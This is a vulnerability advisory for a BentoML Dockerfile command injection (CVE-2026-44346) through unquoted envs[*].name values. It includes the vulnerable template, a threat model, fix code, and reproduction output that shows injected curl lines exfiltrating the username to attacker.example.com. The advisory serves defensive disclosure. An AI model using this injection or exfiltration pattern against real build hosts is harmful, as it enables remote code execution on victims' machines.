CVE-2026-44346

GHSA-w2pm-x38x-jp44 HIGH
Published May 11, 2026

# BentoML `envs[*].name` Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043

A malicious `bentofile.yaml` containing a newline-injected value in `envs[*].name` produces unquoted `RUN` directives in the BentoML-generated Dockerfile. When the victim runs `bentoml containerize`...

Affected Systems

| Package | Ecosystem | Vulnerable Range | Patched |
|---------|-----------|------------------|---------|
| bentoml | pip       | <= 1.4.38        | 1.4.39  |

Severity & Risk

CVSS 3.1: 8.8 / 10
EPSS: N/A
Exploitation Status: No known exploitation
Sophistication: N/A

Attack Surface

AV: Network
AC: Low
PR: None
UI: Required
S: Unchanged
C: High
I: High
A: High

Recommended Action

Patch available

Update bentoml to version 1.4.39

Frequently Asked Questions

What is CVE-2026-44346?

Dockerfile command injection via envs[*].name in bentofile.yaml (sibling fix-bypass of CVE-2026-33744 and CVE-2026-35043)

Is CVE-2026-44346 actively exploited?

No confirmed active exploitation of CVE-2026-44346 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44346?

Update to patched version: bentoml 1.4.39.

What is the CVSS score for CVE-2026-44346?

CVE-2026-44346 has a CVSS v3.1 base score of 8.8 (HIGH).

Technical Details

NVD Description

# BentoML `envs[*].name` Dockerfile command injection — sibling of CVE-2026-33744 / CVE-2026-35043

A malicious `bentofile.yaml` containing a newline-injected value in `envs[*].name` produces unquoted `RUN` directives in the BentoML-generated Dockerfile. When the victim runs `bentoml containerize` on the imported bento, those `RUN` directives execute on the host during `docker build`. Verified end-to-end on `bentoml==1.4.38`.

## Vulnerable code

`src/bentoml/_internal/container/frontend/dockerfile/templates/base_v2.j2:71-73`:

```jinja
{% for env in __bento_envs__ %}
{% set stage = env.stage | default("all") -%}
{% if stage != "runtime" -%}
ARG {{ env.name }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}
ENV {{ env.name }}=${{ env.name }}
{% endif -%}
{% endfor %}
```

`env.value` is bash-quoted via the `bash_quote` filter, but **`env.name` is interpolated raw** with no escaping or newline filtering. The template is rendered by `_bentoml_impl/docker.generate_dockerfile` (the v2 SDK Docker generation path used by `bentoml containerize` for modern services).

## Sibling relationship to existing CVEs

The earlier patches addressed the same Dockerfile-command-injection class for a different bentofile field:

- **CVE-2026-33744 / GHSA-jfjg-vc52-wqvf** (2026-03-25): added `bash_quote` to `system_packages` interpolation in Dockerfile templates and `images.py`.
- **CVE-2026-35043 / GHSA-fgv4-6jr3-jgfw** (2026-04-02): added `shlex.quote` to `system_packages` in the cloud deployment path (`_internal/cloud/deployment.py:1648`).

Both patches limit themselves to `system_packages`. The `envs[*].name` field is the same root-cause class (`bentofile.yaml` value flowing unquoted into a Dockerfile interpretation context) but was never included in the fix scope.

## Reproduction

```bash
pip install bentoml==1.4.38
python verify_render.py
```

Expected:

```
[*] rendered Dockerfile size: 1789 bytes
[*] injected RUN lines: 3
RUN curl -fsSL http://attacker.example.com/$(whoami)=1
RUN curl -fsSL http://attacker.example.com/$(whoami)=$FOO
RUN curl -fsSL http://attacker.example.com/$(whoami)
```

Each injected `RUN` line is a Dockerfile command that runs during `docker build`. With `$(whoami)` shell-substituted by Docker's RUN executor, the example payload exfiltrates the build host's username.

## Threat model

1. Attacker authors a malicious bento with a crafted `bentofile.yaml`.
2. Attacker exports the bento (`.bento` or `.tar.gz`) and distributes (S3, HTTP, BentoCloud share, etc.).
3. Victim imports with `bentoml import bento.tar`; no validation of `envs` content.
4. Victim runs `bentoml containerize` to build the container image.
5. BentoML renders the Dockerfile with the attacker's `envs` values, producing injected `RUN` lines.
6. `docker build` (or BuildKit) executes the injected `RUN` commands on the build host, achieving RCE in the victim's build environment.

The flow mirrors CVE-2026-33744 exactly, with `envs` substituted for `system_packages`.

## Suggested fix

In `base_v2.j2` lines 71-73, apply the `bash_quote` filter to `env.name` (and to the `=$VAR` reference in the `ENV` line, since the variable name itself is reused there):

```jinja
ARG {{ env.name | bash_quote }}{% if env.value %}={{ env.value | bash_quote }}{% endif %}
ENV {{ env.name | bash_quote }}=${{ env.name | bash_quote }}
```

Better, since `env.name` is semantically a Dockerfile identifier, validate at the schema level: in `bentoml/_internal/bento/build_config.py:BentoEnvSchema`, add an `attr.validators.matches_re(r"^[A-Za-z_][A-Za-z0-9_]*$")` to the `name` field so newline / shell-metacharacter values are rejected at config load.

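Added example (not BentoML's code and not the reporter's PoC): the schema-level name check suggested above, applied to an already-parsed `envs` list, next to a simplified stand-in for the `ARG`/`ENV` loop in `base_v2.j2`. All function names, the sample entries and the use of `shlex.quote` in place of the `bash_quote` filter are assumptions made for illustration.

```python
import re
import shlex

# Identifier pattern suggested in the advisory for envs[*].name.
ENV_NAME_RE = re.compile(r"^[A-Za-z_][A-Za-z0-9_]*$")
KEYWORDS = {"ARG", "ENV", "RUN", "COPY", "ADD", "USER", "FROM", "CMD"}

def is_valid_env_name(name):
    # fullmatch, not match: with re.match, "$" also matches before a trailing "\n".
    return isinstance(name, str) and ENV_NAME_RE.fullmatch(name) is not None

def audit_envs(envs):
    """Return (index, name) for every entry whose name is not a plain identifier."""
    return [(i, e.get("name")) for i, e in enumerate(envs)
            if not is_valid_env_name(e.get("name"))]

def render_env_block(envs):
    """Simplified stand-in for the template loop: name raw, value shell-quoted."""
    lines = []
    for env in envs:
        if env.get("stage", "all") == "runtime":
            continue
        name, value = env["name"], env.get("value")
        lines.append(f"ARG {name}" + (f"={shlex.quote(value)}" if value else ""))
        lines.append(f"ENV {name}=${name}")
    return "\n".join(lines)

def instruction_counts(text):
    """Count Dockerfile instructions by the first word of each rendered line."""
    counts = {}
    for line in text.splitlines():
        word = line.split(maxsplit=1)[0].upper() if line.strip() else ""
        if word in KEYWORDS:
            counts[word] = counts.get(word, 0) + 1
    return counts

def render_checked(envs):
    """Validate names first and refuse to render if any entry is rejected."""
    bad = audit_envs(envs)
    if bad:
        raise ValueError(f"rejected envs[*].name values: {bad!r}")
    return render_env_block(envs)

# Constructed sample input; the crafted name only echoes a harmless marker.
BENIGN = [{"name": "FOO", "value": "1"}]
CRAFTED = [{"name": "FOO\nRUN echo injected-marker", "value": "1"}]
```

`instruction_counts(render_env_block(CRAFTED))` reports three `RUN` instructions from a single `envs` entry, the same shape as the three injected lines in the reproduction output, while `render_checked(CRAFTED)` raises before anything is rendered.
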
## Affected versions

- bentoml 1.4.38 (verified end-to-end)
- Likely all 1.x versions where `_bentoml_impl/docker.py` exists; the v2 SDK code path was added before the CVE-2026-33744 / CVE-2026-35043 patches and was not retroactively swept for siblings.

## Disclosure

Requesting CVE assignment and GHSA publication. Available for additional repro under different distros / frontends, or for a PR with the suggested fix, on request.

## PoC artifacts

Gated HF repo (request access): https://huggingface.co/mrw0r57/bentoml-envs-cmdinjection-poc

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published: May 11, 2026
Last Modified: May 11, 2026
First Seen: May 11, 2026

Related Vulnerabilities